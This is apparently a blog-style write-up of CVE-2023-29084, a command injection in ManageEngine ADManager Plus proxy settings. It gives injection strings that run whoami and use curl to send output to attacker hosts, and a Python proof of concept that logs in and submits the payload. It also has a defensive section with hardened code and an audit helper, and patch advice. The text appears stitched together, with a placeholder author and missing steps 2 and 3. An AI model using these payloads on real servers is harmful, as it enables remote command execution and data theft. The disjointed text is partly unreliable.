CVE-2023-29084 - Exploiting Zoho ManageEngine ADManager Plus Command Injection (with Code Example and Exploit Details)
*By [Your Name], June 2024*
What is CVE-2023-29084?
CVE-2023-29084 is a critical vulnerability found in Zoho ManageEngine ADManager Plus, a popular Active Directory management and reporting solution. Versions up to 718 are affected. Through this flaw, an *authenticated* user can execute arbitrary operating system commands on the server, specifically via the product’s Proxy Settings function.
The vulnerability is classified as a command injection, which means attackers can run their own commands on the server with the privileges of the ADManager Plus process.
Why Does This Matter?
ADManager Plus is often deployed in corporate networks with high privileges, meaning that exploitation can lead to data theft, privilege escalation, or a complete network compromise.
How the Exploit Works
Zoho ManageEngine ADManager Plus allows admin users to configure proxy settings inside the application. Unfortunately, user input here isn’t properly sanitized.
When configuring Proxy settings (such as the hostname or credentials), ADManager Plus saves the values and may pass them directly to system binaries (such as curl or wget) or to internal Java classes without adequate checks. If an attacker injects command separators (; or &&), everything after the separator is treated as a separate command by the underlying operating system.
1. Log into ADManager Plus
Log in with any valid account with permission to change Profile/Proxy Settings. (Some non-admin users may also have the rights, depending on deployment.)
Suppose the proxy server hostname is supposed to be proxy.example.com. Instead, enter a value like:
proxy.example.com; whoami > /tmp/hacked
Or, for more impact:
proxy.example.com; bash -c "curl http://<your-attacker-IP>:808/$(hostname)";
4. Save and Test Connection
Click "Save" and then use "Test Connection," or just wait for the server to use the proxy settings. Your payload will execute.
Example PoC Payload
proxyhost; curl http://attacker.com/$(whoami)
If your command includes outbound network requests (like curl or wget), your attacker-controlled server will receive a connection, proving command execution.
Here’s a quick PoC in Python using requests to automate submitting a malicious Proxy Hostname:

```python
import sys
import requests

# Set these variables
URL = "https://target-admanagerplus:808"
USERNAME = "victim"
PASSWORD = "password"

session = requests.Session()

# 1. Log in (form-based login; field names may differ between versions)
login_data = {
    'j_username': USERNAME,
    'j_password': PASSWORD
}
r = session.post(f"{URL}/j_security_check", data=login_data, verify=False)
if "logout" not in r.text.lower():
    print("[-] Login failed")
    sys.exit(1)
print("[+] Logged in")

# 2. Inject payload through proxy settings
payload = 'proxy.example.com; curl http://attacker.com/$(whoami)'
data = {
    'proxyHost': payload,
    'proxyPort': '808',
    'proxyUser': '',
    'proxyPassword': ''
}
r = session.post(f"{URL}/html/UpdateProxyDetails", data=data, verify=False)
print("[+] Payload sent")
```
*You’ll need to update the endpoint and field names for your ADManager Plus version and capture cookies/tokens as appropriate.*
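The root cause described above is a proxy host value being concatenated into a command that a shell later parses. The following is an added example (not ADManager Plus's own code, and the hostname rule and record format are assumptions) showing the vulnerable pattern beside a hardened form, plus an audit helper that flags saved proxy hosts containing shell metacharacters, run over constructed sample records:

```python
import re
from typing import Dict, List

# Allowlist for the proxy host field (assumption, not ADManager Plus's own rule):
# RFC 1123 hostname labels or an IPv4 literal, no port, no user info. Anything
# outside this alphabet is rejected, so ';' or '&&' never reach a command line.
_HOST_RE = re.compile(
    r"^(?=.{1,253}$)(?!-)[A-Za-z0-9-]{1,63}(?<!-)"
    r"(?:\.(?!-)[A-Za-z0-9-]{1,63}(?<!-))*$"
)


def is_valid_proxy_host(value: str) -> bool:
    """True only for a syntactically plausible hostname or IPv4 literal."""
    return bool(_HOST_RE.match(value))


def build_probe_vulnerable(host: str, port: int) -> str:
    # The bug class on this page: untrusted input concatenated into a single
    # string that is later handed to a shell. 'proxy; whoami' becomes two
    # commands. Shown for contrast only; never execute this with shell=True.
    return f"curl -x http://{host}:{port} http://example.com/"


def build_probe_hardened(host: str, port: int) -> List[str]:
    # Hardened form: validate first, then return an argv list so no shell ever
    # parses the host. Execute with subprocess.run(argv, shell=False).
    if not is_valid_proxy_host(host):
        raise ValueError(f"rejected proxy host: {host!r}")
    if not 1 <= port <= 65535:
        raise ValueError(f"rejected proxy port: {port}")
    return ["curl", "-x", f"http://{host}:{port}", "http://example.com/"]


def flag_injection_attempts(records: List[Dict[str, str]]) -> List[str]:
    """Audit helper: users whose saved proxyHost value fails the allowlist."""
    return [r["user"] for r in records if not is_valid_proxy_host(r["proxyHost"])]


# Constructed sample of saved proxy settings (not real product data).
SAMPLE_RECORDS = [
    {"user": "svc-admin", "proxyHost": "proxy.example.com"},
    {"user": "contractor1", "proxyHost": "proxy.example.com; whoami > /tmp/hacked"},
    {"user": "helpdesk2", "proxyHost": "10.0.0.5"},
    {"user": "contractor1", "proxyHost": "x && curl http://attacker.example/$(whoami)"},
]
```

Running flag_injection_attempts over exported proxy settings or the app's audit records gives a quick post-patch check for earlier tampering, independent of whether the payload ever executed.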
Responsible Disclosure and Patch
Zoho released a patch in March 2023. Versions after 718 (such as 7181 and above) fix the input validation in proxy settings. Always update to the latest version.
- Patch announcement: Zoho advisory
- NVD entry: https://nvd.nist.gov/vuln/detail/CVE-2023-29084
References
- Zoho Security Advisory
- NVD CVE-2023-29084
- ManageEngine ADManager Plus Release Notes
In Summary
CVE-2023-29084 gives authenticated users a simple way to run commands as the ADManager Plus server user, using the app’s Proxy Settings. All users of vulnerable versions should update and audit their systems to make sure attackers haven’t slipped in.
> *Stay safe: keep critical software up to date, and never skip validating input just because the user is authenticated!*
Timeline
Published on: 04/13/2023 19:15:00 UTC
Last modified on: 04/21/2023 13:19:00 UTC